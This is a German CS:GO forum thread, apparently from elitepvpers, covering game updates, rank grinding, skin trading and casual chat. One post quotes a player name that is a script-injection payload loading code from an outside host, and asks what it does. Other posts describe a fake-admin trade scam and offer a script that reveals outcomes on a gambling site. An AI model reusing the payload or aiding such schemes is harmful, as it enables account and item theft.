![]() |
Hab gehört dieser Nepo hat keine Angst?!
5-7 braucht mehr dmg denke ich mal |
Quote:
Quote:
|
Quote:
Quote:
|
steam://joinlobby/730/109775242377727269/76561198228258844
+3 |
Quote:
|
Quote:
– Zeus: — Increased price to $200 — Reduced kill award to $0 — Reduced max player speed to 220 [IMG=expandable: 1]http://vignette3.wikia.nocookie.net/glee/images/7/76/Okay-Guy-Meme-Face.jpg/revision/latest?cb=20120318034604[/IMG] |
ach macht es spaß auf Reddit leute fertig zu machen die ESEA haten.
btw. ich mag die ak |
Quote:
RIP Balkan Beats und Türkisches Gedudel meiner Gegner im Warmup will doch meine Gegner flamen können und in 15 Sprachen zurück geflamt werden :< naja, immerhin kann ich am Ende noch "BOOSTED!!1" reinschreien |
Quote:
|
Quote:
________ sehen uns dann heut Abend ingame |
Quote:
|
Quote:
|
Quote:
|
Quote:
|
Quote:
|
gibt es bei steam offizielle "trade assistents" die überprüfen ob items "geglitched" sind? Wollte gerade traden, dann hat mir der user gesagt ich solle [Only registered and activated users can see links. Click Here To Register...] adden (angeblich ein admin oder so) und sie fragen ob meine Items geglitched sind, da mein gegenüber schon wegen sowas gebannt wurde. Ich war schon misstrauisch, aber als dieser "Admin" dann meine Items haben wollte um diese zu prüfen habe ich gestoppt.
Das ganze ist Bullshit, oder gibt es das doch? |
Quote:
|
Quote:
|
Quote:
|
Da fängt man nach vielen Monaten mal wieder mit CS:GO an und sieht, dass man nun Rank 3? sein muss, damit man erst Matchmaking spielen kann. Mein alter Rank ist ja auch weg - selbstverständlich nach der Abwesenheit - und um wieder nen Rank zu bekommen muss ich ja erstmal ein Spiel spielen können. Da es ja nun auch keine Operation mehr gibt, dauert das Leveln ohne die Missionen doch sau lange. Wie stelle ich das am besten an?
|
Quote:
Oder spiel Casual, versuch so gut wie möglich zu sein. Obergrenze ist 1000 XP bis Rank 2. Ab Rank 3 500 XP. |
Quote:
Quote:
Quote:
Spoiler:
man kann es nachschauen aber sowas wird eher bei highvalue items gemacht |
Quote:
Es gibt/gab mal angeblich geglitchte Items, da es ein paar sehr sehr seltene Skins mit gleicher float, gleichem aussehen etc gibt .... da war der liebe felix wohl schneller. Ich sollte bis ans ende vom Thread gehen bevor ich antworte :/ |
Quote:
Wollten sie das ganze nicht sogar erhöhen? Wenn dann keine Operation läuft darf man nach 1k Stunden Playedtime 2 Matches gewinnen nur um wieder 1 Tag zu warten :D ( jaja ich weis das war übertrieben ) |
Quote:
|
Quote:
Quote:
|
die können das auch gern auf level10 erhöhen, weniger Hacker/weniger Smurfer
( außer du hast sie jetzt schon hochgelevelt ) |
hat jmd hier vllt bock auf Epvp intern 5vs5? wäre bestimmt nice
|
wollte mich mal wieder an cs:s rantasten, zumal die fps da auch stimmen ;)
kann mir jmd "matchmaking"-server empfehlen? |
Quote:
|
mitlerweile macht mir faceit mehr spaß als mm, aber wenn ich mir dann premium kaufe, muss ich auch schwitzen, dann machts mir keinen spaß mehr.
ws hat premium für einen sinn xd |
Mein Vanilla Butterfly gegen sein M9 Bajo Case Hardened Well Worn?
Steam market sagt ja, steamanalyst und csgostash aber nein :D Kann mir wer helfen? |
Quote:
|
Quote:
habe null ahnung von sowas. auf der playside ist fast gar kein blue, nur ein kleiner klecks :D EDIT: 45% blue ps sagt er |
Quote:
|
Hab soeben nen Spieler gesehen, der auf ner Gamblingseite keinen Namen hatte. Hab ihn dann gefunden und sein namen lautete wie folgt: <script src=http://um.noip.me/s>.
Er meint er kann damit diverse Gamblingseiten "Hacken". Ich finde das ganze etwas merkwürdig, hab mich selbst so umbenannt und mich auf ner Gamblingseite eingeloggt und hatte auch keinen Namen. Links unten im Firefox stand: "verbinde mit um.noip.me" und es hat ewig lange geladen. Habt ihr ne Ahnung was es damit auf sich hat? |
Quote:
|
Quote:
|
Quote:
|
Wieso kann ich bei Wettkampf nicht jede Map spielen ;O ?
Ps. brauch wer ein script für csgo-pool.con womit man direkt sieht wer gewonnen hat ? :D Ist funny die Leute dort aufzuregen weil ich es vorher im Chat schreibe :D |
| All times are GMT +2. The time now is 09:01. |